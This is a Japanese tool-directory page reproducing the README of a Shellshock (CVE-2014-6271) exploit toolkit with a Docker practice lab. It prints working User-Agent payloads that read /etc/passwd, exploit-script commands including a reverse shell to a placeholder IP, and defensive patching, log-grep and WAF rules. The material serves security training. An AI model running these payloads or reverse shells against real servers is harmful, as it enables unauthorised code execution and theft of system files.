Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
bash-apocalypse — Shellshock (CVE-2014-6271) の再現 - 何百万ものサーバーを危険にさらした bash の脆弱性。自動化エクスプロイトツールキット + Burp Suite の方法論 + Docker ラボ。セキュリティ研究と教育のために構築。オフェンシブセキュリティのポートフォリオプロジェクト。 | Kitploit
ツール/GitHubGitHub/mtaha-sec/bash-apocalypse
脆弱性スキャナーペイロード生成エクスプロイトIDS/IPS回避シェルコードウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール設定ミス学習と教育ラボと実践
GitHub
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
mtaha-sec/bash-apocalypse

bash-apocalypse

Shellshock (CVE-2014-6271) の再現 - 何百万ものサーバーを危険にさらした bash の脆弱性。自動化エクスプロイトツールキット + Burp Suite の方法論 + Docker ラボ。セキュリティ研究と教育のために構築。オフェンシブセキュリティのポートフォリオプロジェクト。

リポジトリを見る

Bash Apocalypse

CVE-2014-6271 (Shellshock) 向け自動エクスプロイトツールキット

Severity CVSS Score

2014年に世界中の数百万台のサーバーに影響を与えた Shellshock 脆弱性を実証する、完全なセキュリティ研究プロジェクトです。自動スキャン、エクスプロイト機能、および防御に関する推奨事項を含みます。

Demo


Shellshock とは?

Shellshock (CVE-2014-6271) は、Bash シェルにおける深刻な脆弱性であり、環境変数の操作を通じてリモートでコードを実行される可能性があります。2014年に発見されるまで22年間存在し、世界中の何百万もの Unix/Linux システムに影響を与えました。

仕組み:

root@kitploit:~
# Normal: Bash exports functions as environment variables
my_function='() { echo "hello"; }'

# The bug: Bash continues parsing after the function definition
exploit='() { :;}; echo "PWNED"'  # The second command executes

CGI を使用する Web サーバーは HTTP ヘッダーを環境変数として Bash に渡すため、脆弱性の影響を受けます:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

クイックスタート

root@kitploit:~
# Clone and setup
git clone https://github.com/YOUR-USERNAME/bash-apocalypse.git
cd bash-apocalypse

# Start vulnerable lab
docker-compose up -d

# Run exploit
chmod +x exploit.sh
./exploit.sh --url http://localhost:8080/cgi-bin/test.cgi --cmd "whoami"

特徴

自動スキャナー

  • 脆弱な CGI エンドポイントを発見
  • 複数の注入ポイントをテスト (User-Agent、Referer、Cookie)
  • カスタムワードリストに対応

エクスプロイトツール

  • 出力キャプチャ付きコマンド実行
  • 自動リバースシェル
  • 複数のペイロードオプション

ラボ環境

  • ワンコマンドの Docker セットアップ
  • 隔離された脆弱サーバー
  • 安全なテスト環境

使用方法

脆弱性のスキャン

root@kitploit:~
./exploit.sh --scan --target localhost --port 8080

コマンドの実行

root@kitploit:~
./exploit.sh --url http://target/cgi-bin/test.cgi --cmd "id"

リバースシェルの取得

root@kitploit:~
# Terminal 1
nc -lvnp 4444

# Terminal 2
./exploit.sh --url http://target/cgi-bin/test.cgi --reverse-shell YOUR_IP:4444

手動エクスプロイト (Burp Suite)

ステップ 1: リクエストの傍受

Burp Intercept

ステップ 2: ペイロードの注入

Exploitation

User-Agent ヘッダーを変更:

root@kitploit:~
User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'

ステップ 3: レスポンスの確認

Reverse Shell

サーバーはコマンドを実行し、その出力を返します。


技術的分析

攻撃フロー

root@kitploit:~
Client (Attacker)
    │
    │ HTTP Request with malicious User-Agent
    ▼
Web Server
    │
    │ Passes header as environment variable
    ▼
CGI Script
    │
    │ Spawns Bash process
    ▼
Bash Shell
    │
    │ Parses function + executes trailing commands
    ▼
Command Execution (RCE)

根本原因

Bash が環境変数内で関数定義に遭遇したとき:

  1. 関数を解析する: () { :;}
  2. バグ: 解析を継続し、後続のコマンドを実行してしまう
  3. 結果: 任意のコマンド実行

防御

即時緩和策

root@kitploit:~
# Update Bash
sudo apt-get update && sudo apt-get upgrade bash

# Disable CGI if not needed
sudo a2dismod cgi && sudo systemctl restart apache2

検出

root@kitploit:~
# Check logs for exploitation attempts
grep -E "\\(\\)|\\{.*\\}" /var/log/apache2/access.log

WAF ルール

root@kitploit:~
SecRule REQUEST_HEADERS "\\(\\).*\\{" "deny,status:403,msg:'Shellshock Attack'"

実証されるスキル

  • Web アプリケーションペネトレーションテスト
  • Bash スクリプティングと自動化
  • HTTP プロトコルの操作
  • Docker コンテナ化
  • Burp Suite の習熟
  • 攻撃的セキュリティと防御的セキュリティの両方

プロジェクト構造

root@kitploit:~
bash-apocalypse/
├── README.md
├── exploit.sh              # Main tool
├── payloads.txt            # Test payloads
├── docker-compose.yml      # Lab setup
└── screenshots/
    ├── intercept.png
    ├── Payload.png
    └── result.png

法的免責事項

教育目的のみ。 所有しているシステム、またはテストの明示的な許可を得たシステムのみをテストしてください。無許可のアクセスは違法です。


リソース

  • CVE-2014-6271 の詳細
  • Cloudflare: Shellshock の内部
  • 演習: HackTheBox - Shocker

脆弱性がどのように機能し、どのように防御するかを理解するために構築されました。 ;)

ツールをダウンロード